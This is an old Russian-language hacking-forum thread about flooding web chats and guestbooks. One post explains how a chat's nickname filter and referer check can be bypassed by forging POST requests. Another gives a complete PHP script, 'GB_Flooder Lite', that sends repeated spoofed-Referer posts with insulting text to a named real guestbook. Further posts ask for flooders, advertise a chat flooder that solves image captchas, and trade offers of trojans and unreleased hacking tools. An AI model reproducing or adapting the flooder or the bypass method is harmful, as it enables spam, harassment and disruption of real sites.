Чаты ФЛУД

Discussion in 'Веб-уязвимости' started by art, 5 Oct 2002.

  1. Guest

    Guest Guest

    Reputations:
    0
    KAdot, algol,art
    Если есть флудеры поместите сюда. мне тоже надо
     
  2. Guest

    Guest Guest

    Reputations:
    0
    привет, античат [​IMG]
    для начала хочу сказать, что правильно сделали, что поставили форум - это очень кстати [​IMG]
    если это топ для повествований о флуде чатов, то хочу вам кое что
    рассказать. На примере одного чата.
    Вне все просто: на входе - ник, цвет по выбору и символьного кода,
    и запускают всех с паролем, где проканывает любое число.
    Как ни обидно, но  существует ограничение на все вводимые символы,
    примерно похожее на такое:
    if ($in{'nick'}=~ tr/\/\\\+=~;<>*|`&$!#()[]{}:'" //)
    print "пользователь с таким ником уже существует!";
    exit;

    пробел тоже фильтруется, а если вводишь в разных счислениях,
    то символы проходят как есть. Ну, а если к стоп-символам добавляешь
    произвольные символы(буквы/числа), то только они и проходят.
    Загружацца с их странички - в теле кода
    прописан скрипт с функцией donotdetect(), который не дает возможности
    сохранить образ. я скопировал сам код, убрал вызов функции и дописал
    пути до абсолютных. Затем в дело пошел ник-флудинг, о котором писал
    Algol. Флудилось все 12ю никами: по 3и, с секундной задержкой на каждый.
    хоть соединение было не очень шустрым, тем не мение, когда флудинг
    был остановлен в форточке повисла запись: "hacker? he-he..."
    т.е. стоял так же фильтр на переменные окружения, который
    сопоставлял заголовки, по примерно такому виду:
    <?
    $referer=getenv("HTTP_REFERER");
    if (!ereg("^http://www.myserver.com")) {
           echo "hacker? he-he...\n";
           exit;
    }
    ?>
    Вообщем то вначале я думал, что просто стоит лимит на време между
    соединениями с одного ip, но потом нашел пример, который выше, и стало
    понятно, что это он и работает. и подвязали они его ко всем скриптам,
    т.е. фактически привязав все странички.
     Но зато есть возможность заходить в чат с 1го ip в несколько ников: об этом они не позаботились.
    следовательно можно, все таки отловить, для начала, полный post-запрос,
    изменить переменную заголовка, внести передаваемые значения формы и попытаться отправить,
    полностью эметировав реальную форму. (httpgen или inetcrack)
    если в результате будет log-in, то можно написать простой скриптик, на основе той же
    функции для ввода ника, но так, что бы каждому запросу постоянно присваивался соответственный
    (статичный) refer формы чата.
    Кто нибуть уже сталкивался с чем то подобным? мне так же очень интересны
    ваши комментарии  и мнения.
    До внутренностей чата еще руки не доходили, но скажу сразу, что там нет таких
    интересных моментов, как  вставки <img> и <bgsound>.   Есть возможность изменять <maxlength> и вставлять
    очень длинные форматированные сообщения, но  я проверю позже, т.к. это уже соовсем другое.
    Я ничего не имею против чата - меня интересует сам процесс.  Зато уже долгое време у них в cgi-bin валяется
    скриптик www-sql [​IMG]
     
  3. Guest

    Guest Guest

    Reputations:
    0
    Срочно нужен флудер на пХП!
     
  4. stooper

    stooper New Member

    Joined:
    19 Mar 2004
    Messages:
    1
    Likes Received:
    3
    Reputations:
    10
    так никто и не ответил. Кто  и как пытался обойти привязанный http-refer, при ник-флудинге?
    можно конечно подумать, и скрипт написать, но меня интересуют абсолютно все соображения по поводу.
     
  5. Guest

    Guest Guest

    Reputations:
    0
    Если писать на ПХП. http-refer можно подделать [​IMG]
     
  6. stooper

    stooper New Member

    Joined:
    19 Mar 2004
    Messages:
    1
    Likes Received:
    3
    Reputations:
    10
    2KAdot: сказанул [​IMG] это теоретически всем итак известно.
    а соображения о практике есть [​IMG]
     
  7. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (stooper @ марта 30 2004,21:38)</td></tr><tr><td id="QUOTE">так никто и не ответил. Кто  и как пытался обойти привязанный http-refer, при ник-флудинге?[/QUOTE]<span id='postcolor'>
    А что, подделка реферера это проблема ?
    InetCrack не поможет ?
     
  8. stooper

    stooper New Member

    Joined:
    19 Mar 2004
    Messages:
    1
    Likes Received:
    3
    Reputations:
    10
    как я понимаю, инеткрэк меняет рефер на нужый, работая со статичными запросами: отловил-внес. какой от етого толк, если я использую флудинг из браузера, как
    хтмл-форму? здесь имеет смысл только использовать php или perl, для подделки рефера. меня интересовало только то, как это реализуется из скрипта. так что прога не поможет, если я конечно не захочу все это дело монотонно вносить и генерировать запрос руками [​IMG]
     
  9. NonameXXX

    NonameXXX New Member

    Joined:
    16 Apr 2004
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    art, чат ломалки-обсиралки меня не интересуют что у ты можешь предложить стоящего из троянов? Может у тебя есть программа которая по ник-найму хозина откроет откроет его комп в WinCommander'е?:))) ШУТКА.
    &nbsp; Что есть интересного не по чатам? (Под интересным понимаю любые проги по Хакингу не выложенные в нете)Тебе если хочешь я могу предложить пару ценных прог и скриптов в дополнение к Асе и ее клонам. Более подробное описание после твоего предложения
     
  10. Guest

    Guest Guest

    Reputations:
    0
    если кому нужен флудер, могу запостить. недавно на ПХП написал...
     
  11. stooper

    stooper New Member

    Joined:
    19 Mar 2004
    Messages:
    1
    Likes Received:
    3
    Reputations:
    10
    ну дак и запости. все на него поглазеют, некоторые зададут много вопросов, типа &quot;а че это и вообще нах и как это заюзать &quot; [​IMG]
     
    2 people like this.
  12. Guest

    Guest Guest

    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <?php
    # GB_Flooder Lite
    # Version 0.2 Public
    # Author: KAdot &nbsp;< [email protected] >
    #
    # Конфиг для гостевой баскова :)


    $tar_url = "http://www.baskov.ru/gb/index.xp";
    $host = "www.baskov.ru";
    $port = 80;
    $n = 10;

    $nick = "Любитель рока";
    $city = "посёлок Малые Ебеньки";
    $msg = "басков - позор Росии, таким не место на нашей Родине";


    for ($i = 1; $i <= $n; $i++) {
    $q="action=".urlencode("write")."&amp;section=".urlencode("post")."&amp;page=".urlencode("0")."&amp;name=".urlencode($nick)."&amp;sex=".urlencode("Мужской")."&amp;city=".urlencode($city)."&amp;country=".urlencode("Россия")."&amp;comment=".urlencode($msg);

    $query &nbsp;= "POST ".$tar_url." HTTP/1.1\r\n";
    $query .= "Host: ".$host."\r\n";
    $query .= "Referer: ".$tar_url."\r\n";
    $query .= "User-Agent: Mozilla/4.0 (compatible; GB_Flooder Lite; Windows NT 5.1)\r\n";
    $query .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $query .= "X-Flooder: &nbsp;GB_Flooder Lite &nbsp; Public Version 0.2 &nbsp; &nbsp;Author: KAdot <[email protected]>\r\n";
    $query .= "Content-Length: ".strlen($q)."\r\n";
    $query .= "\r\n".$q;


    $fp = fsockopen($host, 80);

    if (!$fp) {echo "Не могу открыть сокет"; exit;} else {
    fputs($fp, $query);
    fclose($fp);
    sleep(1);
    }
    }

    echo "
    <h2>
    GB_Flooder LIte
    </h2><br>
    Public Version 0.2
    <br>
    Author: <a href='mailto:[email protected]'>KAdot</a>
    <br><br><br><br>
    Цель: <b>$tar_url</b><br>
    Отправлено сообщений: <b>$n</b>";
    ?>
    [/QUOTE]<span id='postcolor'>

    Ловите, мля.
     
  13. Guest

    Guest Guest

    Reputations:
    0
    а ещё
     
  14. Guest

    Guest Guest

    Reputations:
    0
    Я не понял зачем вам флудер на PHP и Perl если для каждого случая надо писать флудер отдельно?
     
  15. Spy

    Spy Banned

    Joined:
    26 Sep 2004
    Messages:
    17
    Likes Received:
    0
    Reputations:
    -5
    Я уже писал в другом разделе, ну и здесь напишу, флудер чатов xakep, xyligan, gameland, распознающий картинки сам. Описание читайте в разделе &quot;Объявления&quot;.
     
  16. Guest

    Guest Guest

    Reputations:
    0
    KAdot если не трудно, скинь на мыло ([email protected]).
    Плиииззззз!